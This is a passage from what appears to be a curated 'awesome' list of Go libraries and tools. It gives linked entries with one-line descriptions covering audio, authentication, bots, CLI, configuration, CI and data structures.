- [WebAssembly](#webassembly)
- [Windows](#windows)
- [XML](#xml)
- [Zero Trust](#zero-trust)
- [Code Analysis](#code-analysis)
- [Editor Plugins](#editor-plugins)
- [Go Generate Tools](#go-generate-tools)
- [Go Tools](#go-tools)
- [Software Packages](#software-packages)
- [DevOps Tools](#devops-tools)
- [Other Software](#other-software)
- [Resources](#resources)
- [Benchmarks](#benchmarks)
- [Conferences](#conferences)
- [E-Books](#e-books)
- [E-books for purchase](#e-books-for-purchase)
- [Free e-books](#free-e-books)
- [Gophers](#gophers)
- [Meetups](#meetups)
- [Style Guides](#style-guides)
- [Social Media](#social-media)
- [Twitter](#twitter)
- [Reddit](#reddit)
- [Websites](#websites)
- [Tutorials](#tutorials)
- [Guided Learning Paths](#guided-learning)
**[⬆ back to top](#contents)**
## Audio and Music
_Libraries for manipulating audio._
- [flac](https://github.com/mewkiz/flac) - Native Go FLAC encoder/decoder with support for FLAC streams.
- [gaad](https://github.com/Comcast/gaad) - Native Go AAC bitstream parser.
- [GoAudio](https://github.com/DylanMeeus/GoAudio) - Native Go Audio Processing Library.
- [gosamplerate](https://github.com/dh1tw/gosamplerate) - libsamplerate bindings for go.
- [id3v2](https://github.com/bogem/id3v2) - ID3 decoding and encoding library for Go.
- [malgo](https://github.com/gen2brain/malgo) - Mini audio library.
- [minimp3](https://github.com/tosone/minimp3) - Lightweight MP3 decoder library.
- [Oto](https://github.com/hajimehoshi/oto) - A low-level library to play sound on multiple platforms.
- [PortAudio](https://github.com/gordonklaus/portaudio) - Go bindings for the PortAudio audio I/O library.
**[⬆ back to top](#contents)**
## Authentication and OAuth
_Libraries for implementing authentication schemes._
- [authboss](https://github.com/volatiletech/authboss) - Modular authentication system for the web. It tries to remove as much boilerplate and "hard things" as possible so that each time you start a new web project in Go, you can plug it in, configure it, and start building your app without having to build an authentication system each time.
- [branca](https://github.com/essentialkaos/branca) - branca token [specification implementation](https://github.com/tuupola/branca-spec) for Golang 1.15+.
- [casbin](https://github.com/hsluoyz/casbin) - Authorization library that supports access control models like ACL, RBAC, and ABAC.
- [cookiestxt](https://github.com/mengzhuo/cookiestxt) - provides a parser of cookies.txt file format.
- [go-guardian](https://github.com/shaj13/go-guardian) - Go-Guardian is a golang library that provides a simple, clean, and idiomatic way to create powerful modern API and web authentication that supports LDAP, Basic, Bearer token, and Certificate based authentication.
- [go-jose](https://github.com/go-jose/go-jose) - Fairly complete implementation of the JOSE working group's JSON Web Token, JSON Web Signatures, and JSON Web Encryption specs.
- [gologin](https://github.com/dghubble/gologin) - chainable handlers for login with OAuth1 and OAuth2 authentication providers.
- [gorbac](https://github.com/mikespook/gorbac) - provides a lightweight role-based access control (RBAC) implementation in Golang.
- [gosession](http://github.com/Kwynto/gosession) - This is quick session for net/http in GoLang. This package is perhaps the best implementation of the session mechanism, or at least it tries to become one.
- [goth](https://github.com/markbates/goth) - provides a simple, clean, and idiomatic way to use OAuth and OAuth2. Handles multiple providers out of the box.
- [jeff](https://github.com/abraithwaite/jeff) - Simple, flexible, secure, and idiomatic web session management with pluggable backends.
- [jwt](https://github.com/pascaldekloe/jwt) - Lightweight JSON Web Token (JWT) library.
- [jwt](https://github.com/cristalhq/jwt) - Safe, simple, and fast JSON Web Tokens for Go.
- [jwt-auth](https://github.com/adam-hanna/jwt-auth) - JWT middleware for Golang http servers with many configuration options.
- [jwt-go](https://github.com/golang-jwt/jwt) - A full featured implementation of JSON Web Tokens (JWT). This library supports the parsing and verification as well as the generation and signing of JWTs.
- [keto](https://github.com/ory/keto) - Open Source (Go) implementation of "Zanzibar: Google's Consistent, Global Authorization System". Ships gRPC, REST APIs, newSQL, and an easy and granular permission language. Supports ACL, RBAC, and other access models.
- [loginsrv](https://github.com/tarent/loginsrv) - JWT login microservice with plugable backends such as OAuth2 (Github), htpasswd, osiam.
- [oauth2](https://github.com/golang/oauth2) - Successor of goauth2. Generic OAuth 2.0 package that comes with JWT, Google APIs, Compute Engine, and App Engine support.
- [osin](https://github.com/openshift/osin) - Golang OAuth2 server library.
- [otpgen](https://github.com/grijul/otpgen) - Library to generate TOTP/HOTP codes.
- [otpgo](https://github.com/jltorresm/otpgo) - Time-Based One-Time Password (TOTP) and HMAC-Based One-Time Password (HOTP) library for Go.
- [paseto](https://github.com/o1egl/paseto) - Golang implementation of Platform-Agnostic Security Tokens (PASETO).
- [permissions2](https://github.com/xyproto/permissions2) - Library for keeping track of users, login states, and permissions. Uses secure cookies and bcrypt.
- [scope](https://github.com/SonicRoshan/scope) - Easily Manage OAuth2 Scopes In Go.
- [scs](https://github.com/alexedwards/scs) - Session Manager for HTTP servers.
- [securecookie](https://github.com/chmike/securecookie) - Efficient secure cookie encoding/decoding.
- [session](https://github.com/icza/session) - Go session management for web servers (including support for Google App Engine - GAE).
- [sessions](https://github.com/adam-hanna/sessions) - Dead simple, highly performant, highly customizable sessions service for go http servers.
- [sessionup](https://github.com/swithek/sessionup) - Simple, yet effective HTTP session management and identification package.
- [sjwt](https://github.com/brianvoe/sjwt) - Simple jwt generator and parser.
**[⬆ back to top](#contents)**
## Blockchain
_Tools for building blockchains._
- [cometbft](https://github.com/cometbft/cometbft) - A distributed, Byzantine fault-tolerant, deterministic state machine replication engine. It is a fork of Tendermint Core and implements the Tendermint consensus algorithm.
- [cosmos-sdk](https://github.com/cosmos/cosmos-sdk) - A Framework for Building Public Blockchains in the Cosmos Ecosystem.
- [go-ethereum](https://github.com/ethereum/go-ethereum) - Official Go implementation of the Ethereum protocol.
- [gossamer](https://github.com/ChainSafe/gossamer) - A Go implementation of the Polkadot Host.
- [solana-go](https://github.com/gagliardetto/solana-go) - Go library to interface with Solana JSON RPC and WebSocket interfaces.
- [tendermint](https://github.com/tendermint/tendermint) - High-performance middleware for transforming a state machine written in any programming language into a Byzantine Fault Tolerant replicated state machine using the Tendermint consensus and blockchain protocols.
**[⬆ back to top](#contents)**
## Bot Building
_Libraries for building and working with bots._
- [bot](https://github.com/go-telegram/bot) - Zero-dependencies Telegram Bot library with additional UI components
- [echotron](https://github.com/NicoNex/echotron) - An elegant and concurrent library for Telegram Bots in Go.
- [ephemeral-roles](https://github.com/ewohltman/ephemeral-roles) - A Discord bot for managing ephemeral roles based upon voice channel member presence.
- [go-chat-bot](https://github.com/go-chat-bot/bot) - IRC, Slack & Telegram bot written in Go.
- [go-joe](https://joe-bot.net) - A general-purpose bot library inspired by Hubot but written in Go.
- [go-sarah](https://github.com/oklahomer/go-sarah) - Framework to build a bot for desired chat services including LINE, Slack, Gitter, and more.
- [go-tgbot](https://github.com/olebedev/go-tgbot) - Pure Golang Telegram Bot API wrapper, generated from swagger file, session-based router, and middleware.
- [go-twitch-irc](https://github.com/gempir/go-twitch-irc) - Library to write bots for twitch.tv chat
- [Golang CryptoTrading Bot](https://github.com/saniales/golang-crypto-trading-bot) - A golang implementation of a console-based trading bot for cryptocurrency exchanges.
- [govkbot](https://github.com/nikepan/govkbot) - Simple Go [VK](https://vk.com) bot library.
- [hanu](https://github.com/sbstjn/hanu) - Framework for writing Slack bots.
- [Kelp](https://github.com/stellar/kelp) - official trading and market-making bot for the [Stellar](https://www.stellar.org/) DEX. Works out-of-the-box, written in Golang, compatible with centralized exchanges and custom trading strategies.
- [larry](https://github.com/ezeoleaf/larry) - Larry 🐦 is a really simple Twitter bot generator that tweets random repositories from Github built in Go.
- [margelet](https://github.com/zhulik/margelet) - Framework for building Telegram bots.
- [micha](https://github.com/onrik/micha) - Go Library for Telegram bot api.
- [olivia](https://github.com/olivia-ai/olivia) - A chatbot built with an artificial neural network.
- [slack-bot](https://github.com/innogames/slack-bot) - Ready to use Slack Bot for lazy developers: Custom commands, Jenkins, Jira, Bitbucket, Github...
- [slacker](https://github.com/shomali11/slacker) - Easy to use framework to create Slack bots.
- [slackscot](https://github.com/alexandre-normand/slackscot) - Another framework for building Slack bots.
- [tbot](https://github.com/yanzay/tbot) - Telegram bot server with API similar to net/http.
- [telebot](https://github.com/tucnak/telebot) - Telegram bot framework is written in Go.
- [telego](https://github.com/mymmrac/telego) - Telegram Bot API library for Golang with full one-to-one API implementation.
- [telegram-bot-api](https://github.com/Syfaro/telegram-bot-api) - Simple and clean Telegram bot client.
- [teleterm](https://github.com/alfiankan/teleterm) - Telegram Bot Exec Terminal Command.
- [Tenyks](https://github.com/kyleterry/tenyks) - Service oriented IRC bot using Redis and JSON for messaging.
- [wayback](https://github.com/wabarc/wayback) - A bot for Telegram, Mastodon, Slack, and other messaging platforms archives webpages.
**[⬆ back to top](#contents)**
## Build Automation
_Libraries and tools help with build automation._
- [1build](https://github.com/gopinath-langote/1build) - Command line tool to frictionlessly manage project-specific commands.
- [anko](https://github.com/GuilhermeCaruso/anko) - Simple application watcher for multiple programming languages.
- [gaper](https://github.com/maxcnunes/gaper) - Builds and restarts a Go project when it crashes or some watched file changes.
- [gilbert](https://go-gilbert.github.io) - Build system and task runner for Go projects.
- [goyek](https://github.com/goyek/goyek) - Create build pipelines in Go.
- [mage](https://github.com/magefile/mage) - Mage is a make/rake-like build tool using Go.
- [mmake](https://github.com/tj/mmake) - Modern Make.
- [realize](https://github.com/tockins/realize) - Go build a system with file watchers and live to reload. Run, build and watch file changes with custom paths.
- [Task](https://github.com/go-task/task) - simple "Make" alternative.
- [taskctl](https://github.com/taskctl/taskctl) - Concurrent task runner.
- [xc](https://github.com/joerdav/xc) - Task runner with README.md defined tasks, executable markdown.
**[⬆ back to top](#contents)**
## Command Line
### Advanced Console UIs
_Libraries for building Console Applications and Console User Interfaces._
- [asciigraph](https://github.com/guptarohit/asciigraph) - Go package to make lightweight ASCII line graph ╭┈╯ in command line apps with no other dependencies.
- [aurora](https://github.com/logrusorgru/aurora) - ANSI terminal colors that support fmt.Printf/Sprintf.
- [box-cli-maker](https://github.com/Delta456/box-cli-maker) - Make Highly Customized Boxes for your CLI.
- [bubble-table](https://github.com/Evertras/bubble-table) - An interactive table component for bubbletea.
- [bubbles](https://github.com/charmbracelet/bubbles) - TUI components for bubbletea.
- [bubbletea](https://github.com/charmbracelet/bubbletea) - Go framework to build terminal apps, based on The Elm Architecture.
- [cfmt](https://github.com/mingrammer/cfmt) - Contextual fmt inspired by bootstrap color classes.
- [cfmt](https://github.com/i582/cfmt) - Simple and convenient formatted stylized output fully compatible with fmt library.
- [chalk](https://github.com/ttacon/chalk) - Intuitive package for prettifying terminal/console output.
- [colourize](https://github.com/TreyBastian/colourize) - Go library for ANSI colour text in terminals.
- [crab-config-files-templating](https://github.com/alfiankan/crab-config-files-templating) - Dynamic configuration file templating tool for kubernetes manifest or general configuration files.
- [ctc](https://github.com/wzshiming/ctc) - The non-invasive cross-platform terminal color library does not need to modify the Print method.
- [go-ataman](https://github.com/workanator/go-ataman) - Go library for rendering ANSI colored text templates in terminals.
- [go-colorable](https://github.com/mattn/go-colorable) - Colorable writer for windows.
- [go-colortext](https://github.com/daviddengcn/go-colortext) - Go library for color output in terminals.
- [go-isatty](https://github.com/mattn/go-isatty) - isatty for golang.
- [go-palette](https://github.com/abusomani/go-palette) - Go library that provides elegant and convenient style definitions using ANSI colors. Fully compatible & wraps the [fmt library](https://pkg.go.dev/fmt) for nice terminal layouts.
- [go-prompt](https://github.com/c-bata/go-prompt) - Library for building a powerful interactive prompt, inspired by [python-prompt-toolkit](https://github.com/jonathanslenders/python-prompt-toolkit).
- [gocui](https://github.com/jroimartin/gocui) - Minimalist Go library aimed at creating Console User Interfaces.
- [gommon/color](https://github.com/labstack/gommon/tree/master/color) - Style terminal text.
- [gookit/color](https://github.com/gookit/color) - Terminal color rendering tool library, support 16 colors, 256 colors, RGB color rendering output, compatible with Windows.
- [lipgloss](https://github.com/charmbracelet/lipgloss) - Declaratively define styles for color, format and layout in the terminal.
- [marker](https://github.com/cyucelen/marker) - Easiest way to match and mark strings for colorful terminal outputs.
- [mpb](https://github.com/vbauerster/mpb) - Multi progress bar for terminal applications.
- [progressbar](https://github.com/schollz/progressbar) - Basic thread-safe progress bar that works in every OS.
- [pterm](https://github.com/pterm/pterm) - A library to beautify console output on every platform with many combinable components.
- [simpletable](https://github.com/alexeyco/simpletable) - Simple tables in a terminal with Go.
- [spinner](https://github.com/briandowns/spinner) - Go package to easily provide a terminal spinner with options.
- [tabby](https://github.com/cheynewallace/tabby) - A tiny library for super simple Golang tables.
- [table](https://github.com/tomlazar/table) - Small library for terminal color based tables .
- [tabular](https://github.com/InVisionApp/tabular) - Print ASCII tables from command line utilities without the need to pass large sets of data to the API.
- [termbox-go](https://github.com/nsf/termbox-go) - Termbox is a library for creating cross-platform text-based interfaces.
- [termdash](https://github.com/mum4k/termdash) - Go terminal dashboard based on **termbox-go** and inspired by [termui](https://github.com/gizak/termui).
- [termenv](https://github.com/muesli/termenv) - Advanced ANSI style & color support for your terminal applications.
- [termui](https://github.com/gizak/termui) - Go terminal dashboard based on **termbox-go** and inspired by [blessed-contrib](https://github.com/yaronn/blessed-contrib).
- [uilive](https://github.com/gosuri/uilive) - Library for updating terminal output in real time.
- [uiprogress](https://github.com/gosuri/uiprogress) - Flexible library to render progress bars in terminal applications.
- [uitable](https://github.com/gosuri/uitable) - Library to improve readability in terminal apps using tabular data.
- [yacspin](https://github.com/theckman/yacspin) - Yet Another CLi Spinner package, for working with terminal spinners.
**[⬆ back to top](#contents)**
### Standard CLI
_Libraries for building standard or basic Command Line applications._
- [acmd](https://github.com/cristalhq/acmd) - Simple, useful, and opinionated CLI package in Go.
- [argparse](https://github.com/akamensky/argparse) - Command line argument parser inspired by Python's argparse module.
- [argv](https://github.com/cosiner/argv) - Go library to split command line string as arguments array using the bash syntax.
- [carapace](https://github.com/rsteube/carapace) - Command argument completion generator for spf13/cobra.
- [carapace-bin](https://github.com/rsteube/carapace-bin) - Multi-shell multi-command argument completer.
- [carapace-spec](https://github.com/rsteube/carapace-spec) - Define simple completions using a spec file.
- [cli](https://github.com/mkideal/cli) - Feature-rich and easy to use command-line package based on golang struct tags.
- [cli](https://github.com/teris-io/cli) - Simple and complete API for building command line interfaces in Go.
- [climax](https://github.com/tucnak/climax) - Alternative CLI with "human face", in spirit of Go command.
- [clîr](https://github.com/leaanthony/clir) - A Simple and Clear CLI library. Dependency free.
- [cmd](https://github.com/posener/cmd) - Extends the standard `flag` package to support sub commands and more in idiomatic way.
- [cmdr](https://github.com/hedzr/cmdr) - A POSIX/GNU style, getopt-like command-line UI Go library.
- [cobra](https://github.com/spf13/cobra) - Commander for modern Go CLI interactions.
- [command-chain](https://github.com/rainu/go-command-chain) - A go library for configure and run command chains - such as pipelining in unix shells.
- [commandeer](https://github.com/jaffee/commandeer) - Dev-friendly CLI apps: sets up flags, defaults, and usage based on struct fields and tags.
- [complete](https://github.com/posener/complete) - Write bash completions in Go + Go command bash completion.
- [Dnote](https://github.com/dnote/dnote) - A simple command line notebook with multi-device sync.
- [elvish](https://github.com/elves/elvish) - An expressive programming language and a versatile interactive shell.
- [env](https://github.com/codingconcepts/env) - Tag-based environment configuration for structs.
- [flag](https://github.com/cosiner/flag) - Simple but powerful command line option parsing library for Go supporting subcommand.
- [flaggy](https://github.com/integrii/flaggy) - A robust and idiomatic flags package with excellent subcommand support.
- [flagvar](https://github.com/sgreben/flagvar) - A collection of flag argument types for Go's standard `flag` package.
- [go-andotp](https://github.com/grijul/go-andotp) - A CLI program to encrypt/decrypt [andOTP](https://github.com/andOTP/andOTP) files. Can be used as a library as well.
- [go-arg](https://github.com/alexflint/go-arg) - Struct-based argument parsing in Go.
- [go-commander](https://github.com/yitsushi/go-commander) - Go library to simplify CLI workflow.
- [go-flags](https://github.com/jessevdk/go-flags) - go command line option parser.
- [go-getoptions](https://github.com/DavidGamba/go-getoptions) - Go option parser inspired by the flexibility of Perl’s GetOpt::Long.
- [gocmd](https://github.com/devfacet/gocmd) - Go library for building command line applications.
- [hiboot cli](https://github.com/hidevopsio/hiboot/tree/master/pkg/app/cli) - cli application framework with auto configuration and dependency injection.
- [job](https://github.com/liujianping/job) - JOB, make your short-term command as a long-term job.
- [kingpin](https://github.com/alecthomas/kingpin) - Command line and flag parser supporting sub commands (superseded by `kong`; see below).
- [liner](https://github.com/peterh/liner) - Go readline-like library for command-line interfaces.
- [mcli](https://github.com/jxskiss/mcli) - A minimal but very powerful cli library for Go.
- [mitchellh/cli](https://github.com/mitchellh/cli) - Go library for implementing command-line interfaces.
- [mow.cli](https://github.com/jawher/mow.cli) - Go library for building CLI applications with sophisticated flag and argument parsing and validation.
- [ops](https://github.com/nanovms/ops) - Unikernel Builder/Orchestrator.
- [pflag](https://github.com/spf13/pflag) - Drop-in replacement for Go's flag package, implementing POSIX/GNU-style --flags.
- [readline](https://github.com/reeflective/readline) Shell library with modern and easy to use UI features.
- [sand](https://github.com/Zaba505/sand) - Simple API for creating interpreters and so much more.
- [sflags](https://github.com/octago/sflags) - Struct based flags generator for flag, urfave/cli, pflag, cobra, kingpin, and other libraries.
- [strumt](https://github.com/antham/strumt) - Library to create prompt chain.
- [subcmd](https://github.com/bobg/subcmd) - Another approach to parsing and running subcommands. Works alongside the standard `flag` package.
- [survey](https://github.com/go-survey/survey) - Build interactive and accessible prompts with full support for windows and posix terminals.
- [ts](https://github.com/liujianping/ts) - Timestamp convert & compare tool.
- [ukautz/clif](https://github.com/ukautz/clif) - Small command line interface framework.
- [urfave/cli](https://github.com/urfave/cli) - Simple, fast, and fun package for building command line apps in Go (formerly codegangsta/cli).
- [version](https://github.com/mszostok/version) - Collects and displays CLI version information in multiple formats along with upgrade notice.
- [wlog](https://github.com/dixonwille/wlog) - Simple logging interface that supports cross-platform color and concurrency.
- [wmenu](https://github.com/dixonwille/wmenu) - Easy to use menu structure for cli applications that prompt users to make choices.
**[⬆ back to top](#contents)**
## Configuration
_Libraries for configuration parsing._
- [aconfig](https://github.com/cristalhq/aconfig) - Simple, useful and opinionated config loader.
- [cleanenv](https://github.com/ilyakaznacheev/cleanenv) - Minimalistic configuration reader (from files, ENV, and wherever you want).
- [config](https://github.com/JeremyLoy/config) - Cloud native application configuration. Bind ENV to structs in only two lines.
- [config](https://github.com/num30/config) - configure you app using file, environment variables, or flags in two lines of code
- [config](https://github.com/olebedev/config) - JSON or YAML configuration wrapper with environment variables and flags parsing.
- [configuration](https://github.com/BoRuDar/configuration) - Library for initializing configuration structs from env variables, files, flags and 'default' tag.
- [configure](https://github.com/paked/configure) - Provides configuration through multiple sources, including JSON, flags and environment variables.
- [configuro](https://github.com/sherifabdlnaby/configuro) - opinionated configuration loading & validation framework from ENV and Files focused towards 12-Factor compliant applications.
- [confita](https://github.com/heetch/confita) - Load configuration in cascade from multiple backends into a struct.
- [conflate](https://github.com/the4thamigo-uk/conflate) - Library/tool to merge multiple JSON/YAML/TOML files from arbitrary URLs, validation against a JSON schema, and application of default values defined in the schema.
- [env](https://github.com/caarlos0/env) - Parse environment variables to Go structs (with defaults).
- [env](https://github.com/junk1tm/env) - A lightweight package for loading environment variables into structs.
- [envcfg](https://github.com/tomazk/envcfg) - Un-marshaling environment variables to Go structs.
- [envconf](https://github.com/ian-kent/envconf) - Configuration from environment.
- [envconfig](https://github.com/vrischmann/envconfig) - Read your configuration from environment variables.
- [envh](https://github.com/antham/envh) - Helpers to manage environment variables.
- [fig](https://github.com/kkyr/fig) - Tiny library for reading configuration from a file and from environment variables (with validation & defaults).
- [gcfg](https://github.com/go-gcfg/gcfg) - read INI-style configuration files into Go structs; supports user-defined types and subsections.
- [genv](https://github.com/sakirsensoy/genv) - Read environment variables easily with dotenv support.
- [go-aws-ssm](https://github.com/PaddleHQ/go-aws-ssm) - Go package that fetches parameters from AWS System Manager - Parameter Store.
- [go-conf](https://github.com/ThomasObenaus/go-conf) - Simple library for application configuration based on annotated structs. It supports reading the configuration from environment variables, config files and command line parameters.
- [go-ini](https://github.com/subpop/go-ini) - A Go package that marshals and unmarshals INI-files.
- [go-ssm-config](https://github.com/ianlopshire/go-ssm-config) - Go utility for loading configuration parameters from AWS SSM (Parameter Store).
- [go-up](https://github.com/ufoscout/go-up) - A simple configuration library with recursive placeholders resolution and no magic.
- [goConfig](https://github.com/crgimenes/goConfig) - Parses a struct as input and populates the fields of this struct with parameters from command line, environment variables and configuration file.
- [godotenv](https://github.com/joho/godotenv) - Go port of Ruby's dotenv library (Loads environment variables from `.env`).
- [gofigure](https://github.com/ian-kent/gofigure) - Go application configuration made easy.
- [GoLobby/Config](https://github.com/golobby/config) - GoLobby Config is a lightweight yet powerful configuration manager for the Go programming language.
- [gone/jconf](https://github.com/One-com/gone/tree/master/jconf) - Modular JSON configuration. Keep you config structs along with the code they configure and delegate parsing to submodules without sacrificing full config serialization.
- [gonfig](https://github.com/milad-abbasi/gonfig) - Tag-based configuration parser which loads values from different providers into typesafe struct.
- [gookit/config](https://github.com/gookit/config) - application config manage(load,get,set). support JSON, YAML, TOML, INI, HCL. multi file load, data override merge.
- [harvester](https://github.com/beatlabs/harvester) - Harvester, a easy to use static and dynamic configuration package supporting seeding, env vars and Consul integration.
- [hjson](https://github.com/hjson/hjson-go) - Human JSON, a configuration file format for humans. Relaxed syntax, fewer mistakes, more comments.
- [hocon](https://github.com/gurkankaymak/hocon) - Configuration library for working with the HOCON(a human-friendly JSON superset) format, supports features like environment variables, referencing other values, comments and multiple files.
- [ingo](https://github.com/schachmat/ingo) - Flags persisted in an ini-like config file.
- [ini](https://github.com/go-ini/ini) - Go package to read and write INI files.
- [ini](https://github.com/wlevene/ini) - INI Parser & Write Library, Unmarshal to Struct,Marshal to Json,Write File,watch file.
- [joshbetz/config](https://github.com/joshbetz/config) - Small configuration library for Go that parses environment variables, JSON files, and reloads automatically on SIGHUP.
- [kelseyhightower/envconfig](https://github.com/kelseyhightower/envconfig) - Go library for managing configuration data from environment variables.
- [koanf](https://github.com/knadh/koanf) - Light weight, extensible library for reading config in Go applications. Built in support for JSON, TOML, YAML, env, command line.
- [konfig](https://github.com/lalamove/konfig) - Composable, observable and performant config handling for Go for the distributed processing era.
- [kong](https://github.com/alecthomas/kong) - Command-line parser with support for arbitrarily complex command-line structures and additional sources of configuration such as YAML, JSON, TOML, etc (successor to `kingpin`).
- [mini](https://github.com/sasbury/mini) - Golang package for parsing ini-style configuration files.
- [nasermirzaei89/env](https://github.com/nasermirzaei89/env) - Simple useful package for read environment variables.
- [nfigure](https://github.com/muir/nfigure) - Per-library struct-tag based configuration from command lines (Posix & Go-style); environment, JSON, YAML
- [onion](https://github.com/goraz/onion) - Layer based configuration for Go, Supports JSON, TOML, YAML, properties, etcd, env, and encryption using PGP.
- [piper](https://github.com/Yiling-J/piper) - Viper wrapper with config inheritance and key generation.
- [store](https://github.com/tucnak/store) - Lightweight configuration manager for Go.
- [swap](https://github.com/oblq/swap) - Instantiate/configure structs recursively, based on build environment. (YAML, TOML, JSON and env).
- [typenv](https://github.com/diegomarangoni/typenv) - Minimalistic, zero dependency, typed environment variables library.
- [uConfig](https://github.com/omeid/uconfig) - Lightweight, zero-dependency, and extendable configuration management.
- [viper](https://github.com/spf13/viper) - Go configuration with fangs.
- [xdg](https://github.com/adrg/xdg) - Go implementation of the [XDG Base Directory Specification](https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html) and [XDG user directories](https://wiki.archlinux.org/index.php/XDG_user_directories).
- [xdg](https://github.com/OpenPeeDeeP/xdg) - Cross platform package that follows the [XDG Standard](https://standards.freedesktop.org/basedir-spec/basedir-spec-latest.html).
**[⬆ back to top](#contents)**
## Continuous Integration
_Tools for help with continuous integration._
- [CDS](https://github.com/ovh/cds) - Enterprise-Grade CI/CD and DevOps Automation Open Source Platform.
- [drone](https://github.com/drone/drone) - Drone is a Continuous Integration platform built on Docker, written in Go.
- [duci](https://github.com/duck8823/duci) - A simple ci server no needs domain specific languages.
- [go-fuzz-action](https://github.com/jidicula/go-fuzz-action) - Use Go 1.18's built-in fuzz testing in GitHub Actions.
- [go-test-coverage](https://github.com/vladopajic/go-test-coverage) - Tool and GitHub action which reports issues when test coverage is below set threshold.
- [gomason](https://github.com/nikogura/gomason) - Test, Build, Sign, and Publish your go binaries from a clean workspace.
- [gotestfmt](https://github.com/GoTestTools/gotestfmt) - go test output for humans.
- [goveralls](https://github.com/mattn/goveralls) - Go integration for Coveralls.io continuous code coverage tracking system.
- [overalls](https://github.com/go-playground/overalls) - Multi-Package go project coverprofile for tools like goveralls.
- [roveralls](https://github.com/LawrenceWoodman/roveralls) - Recursive coverage testing tool.
- [woodpecker](https://github.com/woodpecker-ci/woodpecker) - Woodpecker is a community fork of the Drone CI system.
**[⬆ back to top](#contents)**
## CSS Preprocessors
_Libraries for preprocessing CSS files._
- [gcss](https://github.com/yosssi/gcss) - Pure Go CSS Preprocessor.
- [go-libsass](https://github.com/wellington/go-libsass) - Go wrapper to the 100% Sass compatible libsass project.
**[⬆ back to top](#contents)**
## Data Structures and Algorithms
### Bit-packing and Compression
- [bingo](https://github.com/iancmcc/bingo) - Fast, zero-allocation, lexicographical-order-preserving packing of native types to bytes.
- [binpacker](https://github.com/zhuangsirui/binpacker) - Binary packer and unpacker helps user build custom binary stream.
- [bit](https://github.com/yourbasic/bit) - Golang set data structure with bonus bit-twiddling functions.
- [crunch](https://github.com/superwhiskers/crunch) - Go package implementing buffers for handling various datatypes easily.
- [go-ef](https://github.com/amallia/go-ef) - A Go implementation of the Elias-Fano encoding.
- [roaring](https://github.com/RoaringBitmap/roaring) - Go package implementing compressed bitsets.
### Bit Sets
- [bitmap](https://github.com/kelindar/bitmap) - Dense, zero-allocation, SIMD-enabled bitmap/bitset in Go.
- [bitset](https://github.com/bits-and-blooms/bitset) - Go package implementing bitsets.
### Bloom and Cuckoo Filters
- [bloom](https://github.com/bits-and-blooms/bloom) - Go package implementing Bloom filters.
- [bloom](https://github.com/zhenjl/bloom) - Bloom filters implemented in Go.
- [bloom](https://github.com/yourbasic/bloom) - Golang Bloom filter implementation.
- [bloomfilter](https://github.com/OldPanda/bloomfilter) - Yet another Bloomfilter implementation in Go, compatible with Java's Guava library.
- [boomfilters](https://github.com/tylertreat/BoomFilters) - Probabilistic data structures for processing continuous, unbounded streams.
- [cuckoo-filter](https://github.com/linvon/cuckoo-filter) - Cuckoo filter: a comprehensive cuckoo filter, which is configurable and space optimized compared with other implements, and all features mentioned in original paper is available.
- [cuckoofilter](https://github.com/seiflotfy/cuckoofilter) - Cuckoo filter: a good alternative to a counting bloom filter implemented in Go.
- [ring](https://github.com/TheTannerRyan/ring) - Go implementation of a high performance, thread safe bloom filter.
### Data Structure and Algorithm Collections
- [algorithms](https://github.com/shady831213/algorithms) - Algorithms and data structures.CLRS study.
- [go-datastructures](https://github.com/Workiva/go-datastructures) - Collection of useful, performant, and thread-safe data structures.
- [gods](https://github.com/emirpasic/gods) - Go Data Structures. Containers, Sets, Lists, Stacks, Maps, BidiMaps, Trees, HashSet etc.
- [gostl](https://github.com/liyue201/gostl) - Data structure and algorithm library for go, designed to provide functions similar to C++ STL.
### Iterators
- [goterator](https://github.com/yaa110/goterator) - Iterator implementation to provide map and reduce functionalities.
- [iter](https://github.com/disksing/iter) - Go implementation of C++ STL iterators and algorithms.
### Maps
See also [Database](#database) for more complex key-value stores, and [Trees](#trees) for
additional ordered map implementations.
- [cmap](https://github.com/lrita/cmap) - a thread-safe concurrent map for go, support using `interface{}` as key and auto scale up shards.
- [dict](https://github.com/srfrog/dict) - Python-like dictionaries (dict) for Go.
- [goradd/maps](https://github.com/goradd/maps) - Go 1.18+ generic map interface for maps; safe maps; ordered maps; ordered, safe maps; etc.
### Miscellaneous Data Structures and Algorithms
- [concurrent-writer](https://github.com/free/concurrent-writer) - Highly concurrent drop-in replacement for `bufio.Writer`.
- [conjungo](https://github.com/InVisionApp/conjungo) - A small, powerful and flexible merge library.
- [count-min-log](https://github.com/seiflotfy/count-min-log) - Go implementation Count-Min-Log sketch: Approximately counting with approximate counters (Like Count-Min sketch but using less memory).
- [fsm](https://github.com/cocoonspace/fsm) - Finite-State Machine package.
- [genfuncs](https://github.com/nwillc/genfuncs) - Go 1.18+ generics package inspired by Kotlin's Sequence and Map.
- [go-generics](https://github.com/bobg/go-generics) - Generic slice, map, set, iterator, and goroutine utilities.
- [go-geoindex](https://github.com/hailocab/go-geoindex) - In-memory geo index.
- [go-rampart](https://github.com/francesconi/go-rampart) - Determine how intervals relate to each other.
- [go-rquad](https://github.com/aurelien-rainone/go-rquad) - Region quadtrees with efficient point location and neighbour finding.
- [go-tuple](https://github.com/barweiss/go-tuple) - Generic tuple implementation for Go 1.18+.
- [go18ds](https://github.com/daichi-m/go18ds) - Go Data Structures using Go 1.18 generics.
- [gofal](https://github.com/xxjwxc/gofal) - fractional api for Go.
- [gogu](https://github.com/esimov/gogu) - A comprehensive, reusable and efficient concurrent-safe generics utility functions and data structures library.
- [gota](https://github.com/kniren/gota) - Implementation of dataframes, series, and data wrangling methods for Go.
- [hide](https://github.com/emvi/hide) - ID type with marshalling to/from hash to prevent sending IDs to clients.
- [hilbert](https://github.com/google/hilbert) - Go package for mapping values to and from space-filling curves, such as Hilbert and Peano curves.
- [hyperloglog](https://github.com/axiomhq/hyperloglog) - HyperLogLog implementation with Sparse, LogLog-Beta bias correction and TailCut space reduction.
- [quadtree](https://github.com/s0rg/quadtree) - Generic, zero-alloc, 100%-test covered quadtree.
- [slices](https://github.com/srfrog/slices) - Functions that operate on slices; like `package strings` but adapted to work with slices.
- [slices](https://github.com/twharmon/slices) - Pure, generic functions for slices.
### Nullable Types
- [nan](https://github.com/kak-tus/nan) - Zero allocation Nullable structures in one library with handy conversion functions, marshallers and unmarshallers.
- [null](https://github.com/emvi/null) - Nullable Go types that can be marshalled/unmarshalled to/from JSON.
